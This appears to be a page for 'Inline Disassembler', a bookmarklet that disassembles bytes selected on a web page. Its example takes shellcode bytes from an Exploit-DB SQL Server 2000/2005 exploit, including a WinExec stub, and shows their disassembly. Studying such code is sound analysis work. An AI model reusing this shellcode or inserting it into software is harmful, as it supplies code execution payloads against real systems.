Get started quickly by adding Inline Disassembler to your bookmarks.
If you have any questions feel free to email me at williammahler84@gmail.comAdditionally feel free to connect with me on LinkedIn.
Usage
Select any bytes you would like to disassemble on any page and then click the Inline Disassembler link or your bookmarklet. The disassembly engine will load for a moment and then prompt you to set configuration options before beginning disassembly.
Examples
Source: https://www.exploit-db.com/exploits/38005/ - SQL Server 2000/2005 SQLNS Unhandled Pointer Exploit
"\x64\x8B\x25\x00\x00\x00\x00\xeb\x07\x90\x90\x90" '0C0C0C6C 64:8B25 00000000 MOV ESP,DWORD PTR FS:[0] '0C0C0C73 EB 07 JMP SHORT 0C0C0C7C '0C0C0C75 90 NOP '0C0C0C76 90 NOP '0C0C0C77 90 NOP '12 bytes "\x83\xEC\x24\x8B\xEC\x83\xC5\x30" '0C0C0C7C 83EC 24 SUB ESP,24 '0C0C0C7F 8BEC MOV EBP,ESP '0C0C0C81 83C5 30 ADD EBP,30 '8 bytes '''''''''''''''''''''''''''''shellcode WinExec (win2k sp2) "\xd9\xee\x9b\xd9\x74\x24\xf4\x5e\x83\xc6\x1a\x33\xc0\x50\x56\x68\x41\x41\x41\x41\x68\x16\x41\x86\x7c\xc3" 'D9EE FLDZ '9B WAIT 'D97424 F4 FSTENV (28-BYTE) PTR SS:[ESP-C] '5E POP ESI '83C6 1a ADD ESI,1a '33C0 XOR EAX,EAX '50 PUSH EAX '56 PUSH ESI '68 F1F8807C PUSH kernel32.ExitThread '68 1641867C PUSH kernel32.WinExec 'C3 RETN '''''''''''''''''''''''''''''main